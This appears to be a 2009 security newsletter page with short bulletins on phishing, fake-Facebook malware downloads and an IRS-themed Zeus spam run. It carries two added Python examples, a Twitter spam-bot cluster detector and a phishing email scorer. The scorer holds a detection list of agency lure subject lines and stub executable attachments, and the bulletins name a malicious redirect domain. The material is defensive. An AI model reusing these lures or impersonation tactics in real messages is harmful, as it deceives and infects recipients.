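As an added example, not code from PC Magazine or the original post, the following groups tweets by their text after stripping the parts the bot varies (the tracking URL, the stray trailing letter, case and spacing), flags any text posted by several distinct accounts, and then names the accounts that show up in more than one such cluster. The tweets, account names and URLs are constructed samples modelled on the messages quoted above.

```python
import re
from collections import Counter, defaultdict

# Constructed (user, text) pairs, not real Twitter data. The repeated texts follow the
# messages quoted in the bulletin; the URLs are placeholders.
SAMPLE_TWEETS = [
    ("user01", "File server blew up over the weekend. Over 1000 SQL backup job failures in the inbox this morning."),
    ("user02", "File server blew up over the weekend. Over 1000 SQL backup job failures in the inbox this morning."),
    ("user03", "File server blew up over the weekend. Over 1000 SQL backup job failures in the inbox this morning."),
    ("user04", "File server blew up over the weekend. Over 1000 SQL backup job failures in the inbox this morning."),
    ("user05", "File server blew up over the weekend. Over 1000 SQL backup job failures in the inbox this morning."),
    ("user02", "Do NOT Pay For White Teeth! Learn the trick discovered by a mom http://example.net/a9 n"),
    ("user03", "Do NOT Pay For White Teeth! Learn the trick discovered by a mom http://example.net/b7 n"),
    ("user06", "Do NOT Pay For White Teeth! Learn the trick discovered by a mom http://example.net/c1 n"),
    ("user01", "I recommend http://example.net/h2 where you can compare the top 10 web hosting services k"),
    ("user07", "Lunch with the team today, then back to the SQL migration."),
    ("user08", "Anyone else seeing backup failures this morning?"),
]

URL_RE = re.compile(r"https?://\S+")
TRAILING_LETTER_RE = re.compile(r"\s[a-z]$")   # the stray letter the bot leaves at the end ("... for $5. n")


def normalize(text):
    """Collapse the per-tweet variation (tracking URLs, case, the trailing junk letter, spacing)
    so copies of one template compare equal."""
    t = URL_RE.sub("<url>", text.lower())
    t = TRAILING_LETTER_RE.sub("", t)
    return " ".join(t.split())


def find_bot_clusters(tweets, min_users=3):
    """Group tweets by normalised text. A text posted by min_users or more distinct accounts
    is treated as bot output. Returns {normalised_text: sorted accounts}."""
    users_by_text = defaultdict(set)
    for user, text in tweets:
        users_by_text[normalize(text)].add(user)
    return {t: sorted(u) for t, u in users_by_text.items() if len(u) >= min_users}


def suspect_accounts(tweets, min_users=3, min_clusters=2):
    """Accounts that appear in at least min_clusters flagged clusters. One shared message can be
    a genuine retweet; the same set of accounts posting several identical ads is a botnet."""
    hits = Counter()
    for accounts in find_bot_clusters(tweets, min_users).values():
        hits.update(accounts)
    return sorted(a for a, n in hits.items() if n >= min_clusters)


if __name__ == "__main__":
    for text, accounts in find_bot_clusters(SAMPLE_TWEETS).items():
        print(f"{len(accounts)} accounts: {text[:60]}...")
    print("suspect accounts:", suspect_accounts(SAMPLE_TWEETS))
```

The two thresholds are the tuning knobs: `min_users` decides how many copies of one text count as a campaign, and `min_clusters` keeps a single popular retweet from tarring everyone who shared it.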

    RIM plugs BlackBerry phishing hole

    Research in Motion (RIM) has shipped a fix for a serious security vulnerability that exposes BlackBerry users to phishing attacks.

    The flaw allows malicious hackers to trick BlackBerry device users into connecting to an attacker-controlled Web site, RIM warned in an advisory.

    BlackBerry users are urged to download and apply the BlackBerry Device Software patch as soon as possible.

    In the meantime, RIM recommends that BlackBerry device users exercise caution when clicking on links that they receive in email or SMS messages.

    If a user visits a site that causes a BlackBerry Browser dialog box to warn the user about continuing the connection, the user should select Close connection, the company said.

    ZDNet Zero Day By Ryan Naraine

    Bulletins posted 9/29/2009

    Microsoft Gives Out Free PC Security

    Microsoft has launched a new free anti-malware tool called Microsoft Security Essentials.

    The software is designed to protect consumers from viruses, spyware, and other malicious software.

    It has two strong points going for it: it comes from Microsoft, and it is free.

    Microsoft says Security Essentials is designed to run quietly in the background on PCs, and alert users only when there is an action for them to take.

    The company also says it limits CPU and memory usage, so there is less of an impact on everyday performance.

    They say this is even true on older or less-powerful PCs.

    The product takes advantage of "real-time protection," and is the first Microsoft security product to make use of the company's new Dynamic Signature Service.

    This is a technology that is said to help ensure users stay protected by the most current virus definitions available without having to wait for the next scheduled download.

    Here are the requirements:

    - Operating System: Genuine Windows XP (Service Pack 2 or Service Pack 3); Windows Vista (Gold, Service Pack 1, or Service Pack 2); Windows 7

    - 140 MB of available hard disk space.

    - An Internet connection is required for installation and to download the latest virus and spyware definitions for Microsoft Security Essentials.

    - Internet Browser: Windows Internet Explorer 6.0 or later or Mozilla Firefox 2.0 or later.

    For the full list of requirements, or to compare your current security program with this one, please see the full article. By Chris Crum

    Phishing for Facebook

    Landing on " cc", which appears in the URL as kiano-180809. com, redirects to an IP address that serves a page mimicking Facebook.

    The page carries a bogus Flash player upgrade and, as it opens, automatically downloads a malicious file. Analysis of that file flagged 516 trojans, 352 worms and 71 exploits, and a successful infection created an average of 41 new processes on the target machine.

    Watch out for anything that downloads automatically while you are using Facebook. If you have fallen for this scam, notify your service desk immediately.


    Bulletins posted 9/28/2009

    Malicious Code Spreading via IRS Scam

    There are reports of malicious code circulating via spam email messages that claim to come from the IRS.

    The messages arrive unsolicited, typically with the subject line "Notice of Underreported Income."

    They may contain a link or an attachment; users who click the link or open the attachment may be infected with malicious code, including the Zeus Trojan.

    Do not follow unsolicited web links or open attachments in email messages. If you have fallen for this scam, notify your service desk immediately and change your passwords.

    SC Magazine, by Angela Moscaritolo
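The FBI lures in the 10/07 bulletin and this IRS message share three tells: a subject line from a known list, an executable attachment or a link to a look-alike host, and a sender that invokes an agency without coming from that agency's real domain. As an added example, not from the FBI, SC Magazine or this newsletter, the script below scores messages on those tells. The sample messages are constructed from the subject lines and attachment names in the two bulletins with invented senders, hosts and payloads; `fbi.gov`, `irs.gov` and `dhs.gov` are assumed to be the only legitimate sending domains for the agencies named.

```python
import re
import email
import email.utils
from email import policy
from email.message import EmailMessage
from urllib.parse import urlsplit

EXEC_EXTS = (".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".vbs", ".js")
AGENCY_RE = re.compile(r"\b(fbi|irs|dhs)\b")
OFFICIAL = {"fbi": "fbi.gov", "irs": "irs.gov", "dhs": "dhs.gov"}   # assumed genuine domains
# Subject lines named in the FBI bulletin and the IRS scam report.
LURE_SUBJECTS = {
    "new dhs report",
    "re: weapons of mass destruction directorate",
    "intelligence bulletin no. 267",
    "notice of underreported income",
}
URL_RE = re.compile(r"https?://[^\s<>\"']+")


def under(domain, official):
    return domain == official or domain.endswith("." + official)


def score(msg):
    """Return the reasons a message looks like one of the agency lures ([] if none)."""
    reasons = []
    subject = (msg["Subject"] or "").strip().lower()
    if subject in LURE_SUBJECTS:
        reasons.append("subject matches a known lure")
    # Executable attachments: the delivery vehicle in all three FBI-themed messages.
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        if name.endswith(EXEC_EXTS):
            reasons.append(f"executable attachment {name}")
    # The sender names an agency (display name or domain) but is not under its real domain.
    from_hdr = str(msg["From"] or "").lower()
    _, addr = email.utils.parseaddr(from_hdr)
    sender_domain = addr.rsplit("@", 1)[-1] if "@" in addr else ""
    for tag in sorted(set(AGENCY_RE.findall(from_hdr))):
        if not under(sender_domain, OFFICIAL[tag]):
            reasons.append(f"claims {tag.upper()} but sent from {sender_domain or 'no address'}")
    # Links whose host plays on an agency name without being under its real domain.
    body = msg.get_body(preferencelist=("plain",))
    text = body.get_content() if body is not None else ""
    for url in URL_RE.findall(text):
        host = (urlsplit(url).hostname or "").lower()
        for tag in sorted(set(AGENCY_RE.findall(host))):
            if not under(host, OFFICIAL[tag]):
                reasons.append(f"link to look-alike host {host}")
    return reasons


def score_raw(raw_bytes):
    """The same check on a raw RFC 5322 message, e.g. one pulled from a gateway quarantine."""
    return score(email.message_from_bytes(raw_bytes, policy=policy.default))


def build(sender, subject, body, attachment=None):
    """Construct a test message; attachment is (filename, bytes)."""
    msg = EmailMessage()
    msg["From"], msg["To"], msg["Subject"] = sender, "staff@example.gov", subject
    msg.set_content(body)
    if attachment:
        name, payload = attachment
        msg.add_attachment(payload, maintype="application", subtype="octet-stream", filename=name)
    return msg


# Constructed samples. Subjects and attachment names follow the bulletins; senders, hosts
# and payloads are invented. The last message is a benign control.
SAMPLES = [
    build("FBI Counterterrorism Division <reports@fbi-alerts.example.net>", "New DHS Report",
          "Attached: New Usama Bin Ladin Speech Directed to the People of Europe", ("audio.exe", b"MZ\x90\x00")),
    build("WMD Directorate <wmd@fbi.example.org>", "RE: Weapons of Mass Destruction Directorate",
          "Confidential report attached.", ("reports.exe", b"MZ\x90\x00")),
    build("intel@fbi.example.net", "Intelligence Bulletin No. 267",
          "New Patterns in Al-Qaeda Financing, see attachment.", ("bulletin.exe", b"MZ\x90\x00")),
    build("IRS <noreply@irs-gov.example.com>", "Notice of Underreported Income",
          "Review your statement at http://irs-gov.example.com/review before the deadline."),
    build("Payroll <payroll@example.gov>", "October timesheets",
          "Timesheets are due Friday.", ("timesheets.pdf", b"%PDF-1.4")),
]

if __name__ == "__main__":
    for m in SAMPLES:
        print(f"{m['Subject']}: {'; '.join(score(m)) or 'clean'}")
```

The subject list only catches the lures reported so far; the attachment and look-alike-sender checks are what catch the next variant. A real mail gateway would also verify SPF or DKIM for the claimed agency domain, which a stand-alone check over message content cannot do.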

    Last Updated: October 22, 2009
    Website Contact: David Matthews